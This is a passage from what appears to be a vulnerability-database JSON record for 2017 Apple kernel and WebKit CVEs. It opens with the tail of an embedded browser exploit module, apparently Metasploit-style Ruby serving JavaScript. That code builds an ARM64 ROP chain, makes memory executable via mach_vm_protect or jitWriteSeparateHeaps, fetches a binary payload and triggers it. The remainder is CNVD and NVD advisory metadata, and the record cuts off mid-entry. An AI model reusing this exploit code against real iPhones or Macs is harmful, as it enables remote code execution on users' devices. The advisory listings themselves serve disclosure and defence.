// x27 == x6 (unused)\n arr[pos++] = 0xdead0016; // x26 (unused)\n arr[pos++] = 0xdead0017; // x26 (unused)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x0.lo(); // x24 == x0 (arg1)\n arr[pos++] = x0.hi(); // x24 == x0 (arg1)\n arr[pos++] = x2.lo(); // x23 == x2 (arg3)\n arr[pos++] = x2.hi(); // x23 == x2 (arg3)\n arr[pos++] = x3.lo(); // x22 == x3 (arg4)\n arr[pos++] = x3.hi(); // x22 == x3 (arg4)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdead0018; // x20 (unused)\n arr[pos++] = 0xdead0019; // x20 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdead001c; // x29 (unused)\n arr[pos++] = 0xdead001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n if (x4) {\n arr[pos++] = stackloader.lo();\n arr[pos++] = stackloader.hi();\n } else {\n arr[pos++] = dispatch.lo(); // x8 (target for regloader)\n arr[pos++] = dispatch.hi(); // x8 (target for regloader)\n }\n arr[pos++] = 0xdead1401; // (unused)\n arr[pos++] = 0xdead1402; // (unused)\n arr[pos++] = 0xdead1301; // x20 (unused)\n arr[pos++] = 0xdead1302; // x20 (unused)\n arr[pos++] = x1.lo(); // x19 == x1 (arg2)\n arr[pos++] = x1.hi(); // x19 == x1 (arg2)\n arr[pos++] = 0xdead1201; // x29 (unused)\n arr[pos++] = 0xdead1202; // x29 (unused)\n arr[pos++] = regloader.lo(); // x30 (next gadget)\n arr[pos++] = regloader.hi(); // x30 (next gadget)\n\n // in regloader\n // NOTE: REGLOADER DOES NOT ADJUST SP!\n // sometimes i didn't get expected value in x4\n // and i have no fucking idea why\n // usleep likely did the trick, but I would still keep the code\n // with movx4\n //arr[pos++] = x4.lo() // x4 (should be -- but see lines above)\n //arr[pos++] = x4.hi() // x4 (should be -- but see lines above)\n\n if (x4) {\n // in stackloader:\n arr[pos++] = 0xdaad0010; // unused\n arr[pos++] = 0xdaad0011; // unused\n arr[pos++] = 0xdaad0012; // unused\n arr[pos++] = 0xdaad0013; // unused\n arr[pos++] = 0xdaad1101; // x28 (unused)\n arr[pos++] = 0xdaad1102; // x28 (unused)\n arr[pos++] = 0xdaad0014; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0015; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0016; // x26 (unused)\n arr[pos++] = 0xdaad0017; // x26 (unused)\n arr[pos++] = 0xdaad0018; // x25 (unused)\n arr[pos++] = 0xdaad0019; // x25 (unused)\n arr[pos++] = 0xdaad00f0; // x24 (unused)\n arr[pos++] = 0xdaad00f1; // x24 (unused)\n arr[pos++] = 0xdaad00f2; // x23 (unused)\n arr[pos++] = 0xdaad00f3; // x23 (unused)\n arr[pos++] = 0xdaad00f4; // x22 (unused)\n arr[pos++] = 0xdaad00f5; // x22 (unused)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdaad0018; // x20 (unused)\n arr[pos++] = 0xdaad0019; // x20 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdaad001c; // x29 (unused)\n arr[pos++] = 0xdaad001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n arr[pos++] = dispatch.lo(); // x8 (target for movx4)\n arr[pos++] = dispatch.hi(); // x8 (target for movx4)\n arr[pos++] = 0xdaad1401; // (unused)\n arr[pos++] = 0xdaad1402; // (unused)\n arr[pos++] = x4.lo(); // x20 == x4 (arg5)\n arr[pos++] = x4.hi(); // x20 == x4 (arg5)\n arr[pos++] = 0xdaad1301; // x19 (unused)\n arr[pos++] = 0xdaad1302; // x19 (unused)\n arr[pos++] = 0xdaad1201; // x29 (unused)\n arr[pos++] = 0xdaad1202; // x29 (unused)\n arr[pos++] = movx4.lo(); // x30 (next gadget)\n arr[pos++] = movx4.hi(); // x30 (next gadget)\n }\n\n // after dispatch:\n\n // keep only one: these or 0xdeaded01\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n arr[pos++] = 0xdead002c; // x29 (unused)\n arr[pos++] = 0xdead002d; // x29 (unused)\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call = function(func, x0, x1, x2, x3, x4, jump_to) {\n x0 = x0 || Int64.Zero\n x1 = x1 || Int64.Zero\n x2 = x2 || Int64.Zero\n x3 = x3 || Int64.Zero\n jump_to = jump_to || stackloader\n\n return (ldrx8 ? add_call_via_x8 : add_call_llvm)(\n func, x0, x1, x2, x3, x4, jump_to\n )\n }\n\n #{ios_11 ? '\n if (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) {\n add_call(jitWriteSeparateHeaps\n , Sub(codeAddr, memPoolStart) // off\n , paddr // src\n , shsz // size\n );\n } else {\n fail(\"jitWrite\");\n }\n ' : '\n add_call(mach_vm_protect,\n mach_task_self_, // task\n codeAddr, // addr\n shsz, // size\n new Int64(0), // set maximum\n new Int64(7) // prot (RWX)\n );\n\n add_call(memmove,\n codeAddr, // dst\n paddr, // src\n shsz // size\n );\n '}\n\n add_call(codeAddr,\n dlopen,\n dlsym,\n jitWriteSeparateHeaps,\n memPoolStart,\n memPoolEnd,\n );\n\n for(var i = 0; i < 0x20; ++i)\n {\n arr[pos++] = 0xde00c0de + (i<<16);\n }\n\n var sp = Add(stack, (arrsz - off) * 4);\n memory.writeInt64(Add(el_addr, 0x60), Add(sp, 0x60)); // x29\n memory.writeInt64(Add(el_addr, 0x68), sp); // x2 (copied into sp)\n\n // trigger\n //print(\"u rdy?\")\n wrapper.addEventListener(\"click\", function(){});\n\n}\n\n#{get_mem_rw}\n\nfunction go() {\n try {\n var req = new XMLHttpRequest;\n req.open(\"GET\", \"exploit\");\n req.responseType = \"arraybuffer\";\n req.addEventListener(\"load\", function() {\n try {\n if (req.responseType != \"arraybuffer\") throw \"y u no blob\";\n payload.set(new Uint8Array(req.response), 0x0);\n pwn();\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n });\n req.addEventListener(\"error\", function(ev) {\n fail(ev)\n });\n req.send()\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n};\n\ngo();\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/\\/\\/.*$/, '') # strip comments\n html.gsub!(/^\\s*print\\s*\$.*?\$;\\s*$/, '') # strip print(*);\n end\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/32828", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cnvd": [{"lastseen": "2022-10-08T06:42:00", "description": "A security vulnerability exists in Apple macOS High Sierra, a specialized operating system developed by Apple for Mac computers. macOS High Sierra is caused by a faulty race condition. An attacker could exploit this vulnerability to cause elevated privileges.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-27T00:00:00", "type": "cnvd", "title": "Apple macOS High Sierra Elevation of Privilege Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13905"], "modified": "2022-03-01T00:00:00", "id": "CNVD-2022-15497", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-15497", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T13:24:33", "description": "A race condition was addressed with additional validation. This issue is fixed in tvOS 11.2, iOS 11.2, macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan, watchOS 4.2. An application may be able to gain elevated privileges.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-23T20:15:00", "type": "cve", "title": "CVE-2017-13905", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13905"], "modified": "2022-01-12T19:28:00", "cpe": ["cpe:/o:apple:mac_os_x:10.11.6", "cpe:/o:apple:mac_os_x:10.12.6"], "id": "CVE-2017-13905", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13905", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.11.6:security_update_2016-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.11.6:security_update_2017-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.11.6:security_update_2017-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.6:security_update_2017-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.6:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.11.6:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.11.6:security_update_2016-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.11.6:security_update_2016-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.11.6:security_update_2017-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.11.6:security_update_2017-004:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:23:12", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13862", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13862"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13862", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13862", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T13:23:56", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13876", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13876"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13876", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13876", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T13:23:06", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"IOSurface\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13861", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13861"], "modified": "2019-06-02T17:29:00", "cpe": [], "id": "CVE-2017-13861", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13861", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T13:23:21", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13865", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13865"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13865", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13865", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T13:22:56", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app that triggers type confusion.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13855", "cwe": ["CWE-704"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13855"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13855", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13855", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T13:23:30", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13868", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13868"], "modified": "2019-03-22T19:36:00", "cpe": [], "id": "CVE-2017-13868", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13868", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T18:33:56", "description": "An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-7173", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7173"], "modified": "2018-04-27T17:22:00", "cpe": [], "id": "CVE-2017-7173", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7173", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T13:23:37", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13869", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13869"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13869", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T18:33:55", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"CFNetwork Session\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-7172", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7172"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-7172", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7172", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T18:33:43", "description": "A race condition was addressed with additional validation. This issue affected versions prior to iOS 11.2, macOS High Sierra 10.13.2, tvOS 11.2, watchOS 4.2, iTunes 12.7.2 for Windows, macOS High Sierra 10.13.4.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-03T18:29:00", "type": "cve", "title": "CVE-2017-7151", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7151"], "modified": "2019-04-05T18:32:00", "cpe": [], "id": "CVE-2017-7151", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7151", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T18:33:55", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is 